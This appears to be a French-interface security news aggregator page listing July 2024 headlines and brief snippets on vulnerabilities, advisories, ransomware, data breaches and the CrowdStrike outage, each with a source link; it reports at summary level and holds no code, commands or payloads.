Originally published by CXO REvolutionaries.Written by Sam Curry, VP & CISO in Residence, Zscaler.“History doesn't repeat itself, but it often rhymes.”–Mark TwainWe are in our fourth decade since the Security Administrator Tool for Analyzing Networks (SATAN) hit the scene and we have to ask ourselves, “Why is it still so hard to effectively patch systems?” To be fair, the landscape hasn't exactly stayed the same: the adversaries, defensive tools, even the way we define vulnerabilities and...
https://cloudsecurityalliance.org/articles/adding-a-twist-to-the-epic-of-vulnerability-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FrostyGoop ICS malware targets Ukraine
In April 2024, Dragos researchers spotted the malware FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered an that a nation-state […]
https://securityaffairs.com/166087/malware/frostygoop-ics-malware-modbus.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Custom Inbox Enhancements: Revolutionizing Vulnerability Management for Enterprises
HackerOne's Custom Inboxes Enhancements provide flexible report segmentation, reduce administrative overhead, and mitigate security risks.
https://www.hackerone.com/vulnerability-management/custom-inbox-enhancements
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6910-1: Apache ActiveMQ vulnerabilities
Chess Hazlett discovered that Apache ActiveMQ incorrectly handled certain
commands. A remote attacker could possibly use this issue to terminate
the program, resulting in a denial of service. This issue only affected
Ubuntu 16.04 LTS. (CVE-2015-7559)
Peter Stöckli discovered that Apache ActiveMQ incorrectly handled
hostname verification. A remote attacker could possibly use this issue
to perform a person-in-the-middle attack. This issue only affected Ubuntu
16.04 LTS. (CVE-2018-11775)
Jonathan Gallimore and Colm Ó hÉigeartaigh discovered that Apache
ActiveMQ incorrectly handled authentication in certain functions.
A remote attacker could possibly use this issue to perform a
person-in-the-middle attack. This issue only affected Ubuntu 16.04 LTS,
Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-13920)
Gregor...
https://ubuntu.com/security/notices/USN-6910-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Phish-Friendly Domain Registry “.top” Put on Notice
The Chinese company in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”
https://krebsonsecurity.com/2024/07/phish-friendly-domain-registry-top-put-on-notice/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Play Ransomware Variant Targeting Linux ESXi Environments
Play Ransomware Targets Linux! New Variant Attacks ESXi with Prolific Puma Ties. Learn how to protect your organization…
https://hackread.com/play-ransomware-target-linux-esxi-environments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6530-2: HAProxy vulnerability
Seth Manesse and Paul Plasil discovered that HAProxy incorrectly handled
URI components containing the hash character (#). A remote attacker could
possibly use this issue to obtain sensitive information, or to bypass
certain path_end rules.
https://ubuntu.com/security/notices/USN-6530-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Security Alliance Issues Artificial Intelligence (AI) Model Risk Management Framework
Paper emphasizes importance of model risk management (MRM) for harnessing full potential of AI and machine learning (ML) modelsSEATTLE – July 24, 2024 – The latest set of AI guidance from the Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, explores the importance of Model Risk Management (MRM) in ensuring the responsible development, deployment, and use of A...
https://cloudsecurityalliance.org/articles/cloud-security-alliance-issues-ai-model-risk-management-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google admits it can’t quite quit third-party cookies
Google has taken a new turn in the approach to eliminating third-party cookies. This time it's back to the Privacy Sandbox
https://www.malwarebytes.com/blog/news/2024/07/google-admits-it-cant-quite-quit-third-party-cookies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mexico's Largest ERP Provider ClickBalance Exposes 769 Million Records
ClickBalance ERP provider’s cloud database exposed 769 million records, including API keys and email addresses. Learn how this…
https://hackread.com/mexico-erp-clickbalance-769-million-records-data-leak/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
July 2024: National Make A Difference To Children Month
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Cybercrime Magazine Podcast Interview Sausalito, Calif. – Jul. 23, 2024 There’s something important for everyone to know in July 2024, which is “National Make A Difference To Children Month”: It can
The post July 2024: National Make A Difference To Children Month appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/july-2024-national-make-a-difference-to-children-month/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
5 Reasons IGA Programs Fail
Identity governance and administration (IGA) is a critical part of modern business. It's one of the single most important pieces of creating and balancing a productive and secure work environment....
The post 5 Reasons IGA Programs Fail appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/5-reasons-iga-programs-fail/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Building cyber-resilience: Lessons learned from the CrowdStrike incident
Organizations, including those that weren't struck by the CrowdStrike incident, should resist the temptation to attribute the IT meltdown to exceptional circumstances
https://www.welivesecurity.com/en/cybersecurity/building-cyber-resilience-lessons-learned-crowdstrike-incident/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerabilities in LangChain Gen AI
This article is a detailed study of CVE-2023-46229 and CVE-2023-44467, two vulnerabilities discovered by our researchers affecting generative AI framework LangChain.
The post Vulnerabilities in LangChain Gen AI appeared first on Unit 42.
https://unit42.paloaltonetworks.com/langchain-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
1-15 April 2024 Cyber Attacks Timeline
In the first timeline of April 2024 I collected 107 events (7.13 events/day), as always characterized by a majority of malware attacks.
https://www.hackmageddon.com/2024/07/23/1-15-april-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The tap-estry of threats targeting Hamster Kombat players
ESET researchers have discovered threats abusing the success of the Hamster Kombat clicker game
https://www.welivesecurity.com/en/eset-research/tap-estry-threats-targeting-hamster-kombat-players/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to Enhance Your System's Security with Master Data Governance
Data security has always been a priority. Thanks to AI and machine learning's massive boost…
How to Enhance Your System's Security with Master Data Governance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/23/how-to-enhance-your-systems-security-with-master-data-governance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Need a Penetration Test? Here's What to Do Next
Originally published by Schellman.In our experience, there are typically three reasons why you may move forward with a penetration test and start looking around for a provider. Making that initial decision to move forward with an assessment like this is a big step, but what should you do after you make it? If you fall into any of the following common scenarios that mandate a pen test, here are the immediate next steps to take for each one:
You want to proactively improve your cybersecurity
Yo...
https://cloudsecurityalliance.org/articles/need-a-penetration-test-here-s-what-to-do-next
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The First 10 Days of a vCISOs Journey with a New Client
“In a quaint village nestled between rolling hills and dense forests, a young apprentice named Eli was learning to throw pottery from a master potter. On the first day by...
The post The First 10 Days of a vCISOs Journey with a New Client appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-first-10-days-of-a-vcisos-journey-with-a-new-client/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
In a Cloudy World, On-Premises Still Might be The Way To Go
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber San Jose, Calif. – Jul. 22, 2024 In 2012, I worked for one of the first vendors to deliver security-as-a-service.
The post In a Cloudy World, On-Premises Still Might be The Way To Go appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/in-a-cloudy-world-on-premises-still-might-be-the-way-to-go/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stellar Cyber July
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber San Jose, Calif. – Jul. 22, 2024 In 2012, I worked for one of the first vendors to deliver security-as-a-service.
The post Stellar Cyber July appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/stellar-cyber-july/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Multiple Vulnerabilities Found In XenForo Internet Forum Solution
Numerous security vulnerabilities riddled the XenForo Internet Forum solution, one of which could even allow…
Multiple Vulnerabilities Found In XenForo Internet Forum Solution on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/22/multiple-vulnerabilities-found-in-xenforo-internet-forum-solution/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT
AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux.
For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide.
We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process.
Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT
AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected.
CVE-2024-35198 does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue.
CVE-2024-35199 does not bind two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
'Smart' security cameras: Using them safely in your home
How to protect 'smart' security cameras and baby monitors from cyber attack.
https://www.ncsc.gov.uk/guidance/smart-security-cameras-using-them-safely-in-your-home
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mitigating malware and ransomware attacks
How to defend organisations against malware or ransomware attacks
https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber security for major events
Assessing the cyber security needs of major events.
https://www.ncsc.gov.uk/guidance/cyber-security-for-major-events
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Heritage Foundation data breach containing personal data is available online
Data from the Heritage Foundation containing at least half a million passwords and usernames are available online
https://www.malwarebytes.com/blog/news/2024/07/heritage-foundation-data-breach-containing-personal-data-is-available-online
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Protecting SMS messages used in critical business processes
Security advice for organisations using text messages to communicate with end users
https://www.ncsc.gov.uk/guidance/protecting-sms-messages-used-in-critical-business-processes
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Online gaming for families and individuals
How to enjoy online gaming securely by following just a few tips
https://www.ncsc.gov.uk/guidance/online-gaming-for-families-and-individuals
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Social Media: how to use it safely
Use privacy settings across social media platforms to manage your digital footprint.
https://www.ncsc.gov.uk/guidance/social-media-how-to-use-it-safely
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introduction to identity and access management
This guidance provides a primer on the essential techniques, technologies and uses of access management.
https://www.ncsc.gov.uk/guidance/introduction-identity-and-access-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Using TLS to protect data
Recommended profiles to securely configure TLS for the most common versions and scenarios, with additional guidance for managing older versions.
https://www.ncsc.gov.uk/guidance/using-tls-to-protect-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Boris Karloff Is A Cybersecurity Expert's Best Friend
This week in cybersecurity from the editors at Cybercrime Magazine – Watch the Cybercrime Magazine video Sausalito, Calif. – Jul. 22, 2024 Sherrod DeGrippo, director, threat intelligence, at Microsoft, is a regular guest and fan favorite on the Cybercrime Magazine Podcast. Her best friend, and
The post Boris Karloff Is A Cybersecurity Expert’s Best Friend appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/boris-karloff-is-a-cybersecurity-experts-best-friend/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pioneering the New Frontier in AI Consumer Protection and Cyber Defense
In a groundbreaking move, the first state in the U.S. has passed comprehensive legislation aimed at protecting consumers from the potential risks associated with AI. The new Utah Artificial Intelligence...
The post Pioneering the New Frontier in AI Consumer Protection and Cyber Defense appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/pioneering-the-new-frontier-in-ai-consumer-protection-and-cyber-defense/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From RA Group to RA World: Evolution of a Ransomware Group
Ransomware gang RA World rebranded from RA Group. We discuss their updated tactics from leak site changes to an analysis of their operational tools.
The post From RA Group to RA World: Evolution of a Ransomware Group appeared first on Unit 42.
https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cursed tapes: Exploiting the EvilVideo vulnerability on Telegram for Android
ESET researchers discovered a zero-day Telegram for Android exploit that allows sending malicious files disguised as videos
https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A week in security (July 15 – July 21)
A list of topics we covered in the week of July 15 to July 21 of 2024
https://www.malwarebytes.com/blog/news/2024/07/a-week-in-security-july-15-july-21
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Risks Inherent in Including Security Modules At Kernel Level: Lessons From CrowdStrike Incident
Balancing strong security measures while minimizing operational risks is a constant juggling act in cybersecurity. The recent global outage caused by that bad CrowdStrike update underscores the risks of relying on kernel-level modules for security.
https://linuxsecurity.com/features/features/lessons-from-crowdstrike-incident
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Digital Identities Have Evolved — Cyber Strategies Should Too
The scale of identity exposure has increased significantly, with over 90% of surveyed organizations reporting an identity-related breach within the last year. These attacks have long-lasting consequences – SpyCloud’s 2024 Identity Exposure Report found...
The post Digital Identities Have Evolved — Cyber Strategies Should Too appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/digital-identities-have-evolved-cyber-strategies-should-too/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How a signed driver exposed users to kernel-level threats – Week in Security with Tony Anscombe
A purported ad blocker marketed as a security solution leverages a Microsoft-signed driver that inadvertently exposes victims to dangerous threats
https://www.welivesecurity.com/en/videos/adware-kernel-level-threats-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
File Transfer Cheatsheet: Windows and Linux
File transfer is a crucial step in the post-exploitation scenario while performing penetration testing or red teaming. There are various ways to do the file
The post File Transfer Cheatsheet: Windows and Linux appeared first on Hacking Articles.
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Life360 - 442,519 breached accounts
In July 2024, data scraped from a misconfigured Life360 API was posted online after being obtained several months earlier. The records included 443k unique email addresses and in most cases, corresponding names and phone numbers (some records were null or obfuscated). Life360 promptly notified impacted users after the incident was discovered.
https://haveibeenpwned.com/PwnedWebsites#Life360
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Small Cybersecurity Company Winning Big In The Cybersecurity Space
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full InvestorPlace Story Sausalito, Calif. – Jul. 20, 2024 InvestorPlace reports on Alarum Technologies (NASDAQ: ALAR), a hot publicly-traded company based out of Israel and a global provider of internet access and web
The post The Small Cybersecurity Company Winning Big In The Cybersecurity Space appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-small-cybersecurity-company-winning-big-in-the-cybersecurity-space/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stop Chasing the AI Squirrel and Patch… Just Patch
In the contemporary technological landscape, the allure of advanced artificial intelligence (AI) systems often captivates the collective imagination of the tech industry and beyond. Stories of deepfakes, such as the...
The post Stop Chasing the AI Squirrel and Patch… Just Patch appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/stop-chasing-the-ai-squirrel-and-patch-just-patch/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Open Source Vulnerability Assessment Tools & Scanners
Computer systems, software, applications, and other interfaces are vulnerable to network security threats. Failure to find these cybersecurity vulnerabilities can lead to the downfall of a company. Therefore, businesses must utilize vulnerability scanners regularly within their systems and servers to identify existing loopholes and weaknesses that can be resolved through security patching.
https://linuxsecurity.com/features/features/top-6-vulnerability-scanning-tools
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrowdStrike update at center of Windows “Blue Screen of Death” outage
An enormous IT outage across the world today is not the result of a cyberattack, but rather a faulty update from CrowdStrike.
https://www.malwarebytes.com/blog/uncategorized/2024/07/crowdstrike-update-at-center-of-windows-blue-screen-of-death-outage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security of Custom GitHub Actions
Get details on Legit's research on the security of custom GitHub Actions.
https://www.legitsecurity.com/blog/security-of-custom-github-actions
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Number of data breach victims goes up 1,000%
The Identity Theft Resource Center has published a report showing a 1,170% increase in compromised data victims compared to the same quarter last year.
https://www.malwarebytes.com/blog/news/2024/07/number-of-data-breach-victims-goes-up-1000
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Metasploit Weekly Wrap-Up 7/19/2024
A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.
https://blog.rapid7.com/2024/07/19/metasploit-weekly-wrap-up-7-19-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beyond the blue screen of death: Why software updates matter
The widespread IT outages triggered by a faulty CrowdStrike update have put software updates in the spotlight. Here's why you shouldn't dread them.
https://www.welivesecurity.com/en/cybersecurity/beyond-blue-screen-death-software-updates/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Global Microsoft Meltdown Tied to Bad Crowdstrike Update
A faulty software update from cybersecurity vendor Crowdstrike crippled countless Microsoft Windows computers across the globe today, disrupting everything from airline travel and financial institutions to hospitals and businesses online. Crowdstrike said a fix has been deployed, but experts say the recovery from this outage could take some time, as Crowdstrike's solution needs to be applied manually on a per-machine basis.
https://krebsonsecurity.com/2024/07/global-microsoft-meltdown-tied-to-bad-crowstrike-update/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What's happening with the CrowdStrike incident: When a software update turns into a cyber crisis
This morning's CrowdStrike incident, where a routine update caused a cascading failure across thousands of critical systems worldwide, is a stark reminder of the fragile interconnectedness of our digital world. While this incident was a misstep, not malice, it exposes the vulnerability of our essential services.
https://www.sonatype.com/blog/whats-happening-with-the-crowdstrike-incident-when-a-software-update-turns-into-a-cyber-crisis
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Guardians of the Grid: Cyber-Secure Microgrids and the Future of Energy Resilience
The Crucial Role of Cyber-Resilient Microgrids The vulnerability of major metropolitan power grids to natural disasters has become a pressing concern, but mother nature isn't the only thing threatening our...
The post Guardians of the Grid: Cyber-Secure Microgrids and the Future of Energy Resilience appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guardians-of-the-grid-cyber-secure-microgrids-and-the-future-of-energy-resilience/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The complexities of cybersecurity update processes
If a software update process fails, it can lead to catastrophic consequences, as seen today with widespread blue screens of death blamed on a bad update by CrowdStrike
https://www.welivesecurity.com/en/cybersecurity/complexities-cybersecurity-update-processes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Warning Against the Distribution of Malware Disguised as Software Cracks (Disrupts V3 Lite Installation)
AhnLab SEcurity intelligence Center (ASEC) has previously introduced the dangers of malware disguised as crack programs through a post titled “Distribution of Malware Under the Guise of MS Office Cracked Versions (XMRig, OrcusRAT, etc.)”. [1] Malware strains disguised as crack programs are primarily distributed through file-sharing platforms, blogs, and torrents, leading to the infection of multiple systems. These infected systems are continually managed by threat actors through periodic updates. In this case, it was confirmed that the threat actor installed different...
The post Warning Against the Distribution of Malware Disguised as Software Cracks (Disrupts V3 Lite Installation) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/68011/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Securing development infrastructure: A new frontier in software supply chain security
Software supply chains are indispensable to modern software development as they drive innovation and efficiency across industries. Yet, as vital as they are, these supply chains are also avenues for threats and attacks.
https://www.sonatype.com/blog/securing-development-infrastructure-a-new-frontier-in-software-supply-chain-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FortiMail - SMTP Smuggling
Fortinet is aware of the new SMTP smuggling technique.By exploiting interpretation differences of the SMTP protocol for the end of data sequence, it is possible to send spoofed e-mails, while still passing SPF alignment checks.FortiMail may be susceptible to smuggling attacks if some measures are not put in place. We therefore recommend to adhere to the following indications in order to mitigate the potential risk associated to the smuggling attacks:- Enable DKIM (Domain Keys Identified Mail) to enhance e-mail authentication. Select "None" action under DKIM check in AntiSpam profile in order to block by default e-mail without DKIM signature.- Disable "any-any" traffic policy to restrict unauthorized access.- Modify the configuration settings in line with the recommended security practices...
https://fortiguard.fortinet.com/psirt/FG-IR-24-009
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Unveiling Key Insights from the 2024 Take Command Summit
The 2024 Take Command Summit, held virtually in partnership with AWS, united over 2,000 security professionals to delve into critical cybersecurity issues.
https://blog.rapid7.com/2024/07/18/unveiling-key-insights-from-the-2024-take-command-summit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Continuous Controls Monitoring Solves Traditional GRC Challenges
Originally published by RegScale.Addressing compliance and ensuring strong security measures are increasingly complex tasks for organizations. How can you effectively manage these challenges? Continuous Controls Monitoring (CCM) offers a robust solution, leveraging automation, AI, and real-time data monitoring to enhance governance risk & compliance (GRC). By tackling key issues such as manual compliance processes, fragmented data management, and reactive risk management, CCM empowers org...
https://cloudsecurityalliance.org/articles/how-continuous-controls-monitoring-solves-traditional-grc-challenges
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Anatomy of Cloud Identity Security
Originally published by CyberArk.Written by Alyssa Miles.There's currently a cybersecurity adage with varying verbiage and claimed origins – the point, however, is unmistakable:“Attackers don't break in. They log in.“This saying underscores the strategic shift associated with cloud adoption's prominence in shaping the digital landscape. New environments have created new attack methods to gain access by logging in rather than infiltrating a perimeter. As technologies continue to advance, we ca...
https://cloudsecurityalliance.org/articles/the-anatomy-of-cloud-identity-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NHL Attacks Making Waves: Insights on Latest 5 Incidents
Originally published by Astrix.Non-human identity (NHI) attacks are making waves in the cybersecurity landscape, with five high-profile incidents reported in the past few weeks alone. To help you stay on top of this threat vector, our research team provides insights on the latest incidents in this short article. Let's get started.Incident 1: Snowflake data breach by UNC5537 (May 15, 2024)Incident overview:One of the largest incidents in recent years, hundreds of Snowflake instances have been ...
https://cloudsecurityalliance.org/articles/nhl-attacks-making-waves-insights-on-latest-5-incidents
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Gen Z breakups tainted by login abuse for spying and stalking, research shows
Gen Z, who are most likely to engage in consensual tracking, are also the most likely to face non-consensual tracking after a breakup.
https://www.malwarebytes.com/blog/news/2024/07/gen-z-breakups-tainted-by-login-abuse-for-spying-and-stalking-research-shows
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Container Breakouts: Escape Techniques in Cloud Environments
Unit 42 researchers test container escape methods and possible impacts within a Kubernetes cluster using a containerd container runtime.
The post Container Breakouts: Escape Techniques in Cloud Environments appeared first on Unit 42.
https://unit42.paloaltonetworks.com/container-escape-techniques/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HotPage: Story of a signed, vulnerable, ad-injecting driver
A study of a sophisticated Chinese browser injector that leaves more doors open!
https://www.welivesecurity.com/en/eset-research/hotpage-story-signed-vulnerable-ad-injecting-driver/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SolarWinds Serv-U Information Disclosure Vulnerability (CVE-2024-28995)
What is the Vulnerability?A Directory Traversal Vulnerability in SolarWinds Serv-U software is being actively exploited in the wild. Tracked as CVE-2024-28995, the vulnerability is due to improper validation of the user-supplied inputs. An attacker could exploit this vulnerability by sending crafted requests to the target host machine. Successful exploitation could allow access to read sensitive files on the host machine. CISA has added CVE-2024-28995 to its Known Exploited Vulnerabilities (KEV) catalog on July 17, 2024 and a publicly available proof-of-concept (PoC) exploit code is available.What is the recommended Mitigation?Apply the most recent upgrade or patch from the vendor. https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995 What FortiGuard Coverage is available?FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5495
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity Training for Employees: Upskill the Easy Way with CSA Team Training Programs
The cost and challenge of finding cybersecurity talent is nothing new. Equally challenging is ensuring all stakeholders across your organization have the knowledge they need to stay safe online. The best solution we've found is to train up your existing teams, providing:Solid security foundations and cybersecurity awareness for non-technical stakeholders.Knowledge of the latest tools and strategies for the technical talent that you've already invested in.An aligned security language for every...
https://cloudsecurityalliance.org/articles/cybersecurity-training-for-employees-upskill-the-easy-way-with-csa-group-training-programs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Remote Work, Remote Risks: Strategies for Securing Your Distributed Workforce
Remember that news story a few months ago about a wave of cyberattacks targeting employees…
Remote Work, Remote Risks: Strategies for Securing Your Distributed Workforce on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/17/remote-work-remote-risks-strategies-for-securing-your-distributed-workforce/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How HackerOne Organizes a Remote Hack Week
https://www.hackerone.com/culture-and-talent/how-hackerone-organizes-remote-hack-week
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Connect with Microsoft Security at Black Hat USA 2024
Join Microsoft Security leaders and other security professionals from around the world at Black Hat USA 2024 to learn the latest information on security in the age of AI, cybersecurity protection, threat intelligence insights, and more.
The post Connect with Microsoft Security at Black Hat USA 2024 appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/17/connect-with-microsoft-security-at-black-hat-usa-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Rite Aid says 2.2 million people affected in data breach
Rite Aid has started notifying 2.2 million people that were affected by data breach that was part of a June ransomware attack.
https://www.malwarebytes.com/blog/news/2024/07/rite-aid-says-2-2-million-people-affected-in-data-breach
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Private HTS Program Continuously Used in Attacks
AhnLab SEcurity intelligence Center (ASEC) has previously covered a case where Quasar RAT was distributed through private home trading systems (HTS) in the blog post “Quasar RAT Being Distributed by Private HTS Program“. The same threat actor has been continuously distributing malware, and attack cases have been confirmed even recently. Similar to the previous case, the malware was distributed through an HTS named HPlus. The overall infection flow remains similar, but the initial distribution file, which was previously in the...
The post Private HTS Program Continuously Used in Attacks appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67969/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-38112)
What is the Vulnerability?CVE-2024-38112 is a spoofing vulnerability in Windows MSHTML Platform. The attacker can abuse internet shortcuts and Microsoft protocol handlers to execute malicious code. This vulnerability is known to be used by attackers to deliver information stealer malware and CISA has added CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog on July 9th, 2024.What is the recommended Mitigation?Microsoft has released a fix for this vulnerability. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112 What FortiGuard Coverage is available?FortiGuard Labs has provided protection through the IPS signature "MS.Office.Internet.Shortcut.File.Remote.Code.Execution" to detect and block any attack attempts targeting the vulnerability (CVE-2024-38112).FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5494
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Progress Telerik Report Server Authentication Bypass Vulnerability
What is the Vulnerability?Progress Telerik Report Server contains an authorization bypass by spoofing vulnerability, allowing an attacker to bypass authentication and create rogue administrator users. The flaw, tracked as CVE-2024-4358, has been added to CISA's known exploited vulnerabilities catalog (KEV) in mid-June and FortiGuard Labs continues to see attack attempts targeting this particular vulnerability.What is the recommended Mitigation?Apply mitigations as outlined in the vendor advisory: https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 What FortiGuard Coverage is available?FortiGuard Labs has provided protection through the IPS signature "Progress.Telerik.Report.Server.Register.Authentication.Bypass" which was released in mid-June to detect...
https://fortiguard.fortinet.com/threat-signal-report/5480
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Incident Response in Cloud Security
Written by Ashwin Chaudhary, CEO, Accedere.
Computer security incident response has become an important component of information
technology (IT) programs. Cybersecurity-related attacks have become not only more
numerous and diverse but also more damaging and disruptive. New types of security-related
incidents emerge frequently. Preventive activities based on the results of risk assessments
can lower the number of incidents, but not all incidents can be prevented.
An incident response capabil...
https://cloudsecurityalliance.org/articles/incident-response-in-cloud-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Enhancing AI Reliability: Introducing the LLM Observability & Trust API
